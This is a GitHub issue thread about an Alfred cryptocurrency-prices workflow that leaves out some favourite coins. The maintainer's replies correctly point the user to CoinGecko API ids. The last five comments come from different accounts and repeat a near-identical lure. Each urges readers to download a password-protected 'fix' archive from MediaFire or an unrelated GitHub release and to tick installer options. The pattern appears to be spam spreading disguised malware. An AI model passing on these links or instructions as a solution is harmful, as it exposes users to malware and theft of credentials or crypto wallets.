### ISSUE TITLE
Favorite coins issue

### ISSUE THREAD

**Issue by ivankozlov** [fedecalendino/alfred-crypto-prices#2]
Some of the coins from the favorite list are not presented in search results.

<img width="498" alt="image" src="https://user-images.githubusercontent.com/1015311/217291847-158266db-ced9-49c8-bcc9-9e84b81880ce.png">

<img width="712" alt="image" src="https://user-images.githubusercontent.com/1015311/217292032-3f0a7cea-ba91-42c8-ab32-9f54b8e85a63.png">

**Comment by fedecalendino** [comment]
Hi again!

It seems that there are some issues with coingecko's api with some of them:

* https://api.coingecko.com/api/v3/coins/bnb
* https://api.coingecko.com/api/v3/coins/toncoin

Both return `{"error":"coin not found"}` for some reason, I already contacted them about it.


Hopefully, CG will fix the issue from their side and the workflow should resume working properly.


Fede.

**Comment by fedecalendino** [comment]
Hi!

After digging around I found that you can use the following ids for the ones that you are missing:

* BNB: `binancecoin`
* TON: `the-open-network`
* ADA: `cardano`

The `API id` is what is needed, not the end of the url as I thought:

<img width="373" alt="CleanShot 2023-02-07 at 23 38 13@2x" src="https://user-images.githubusercontent.com/7383708/217382910-705cad25-33bf-4d04-abd0-04bb0f8a7327.png">


Cheers, Fede.

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
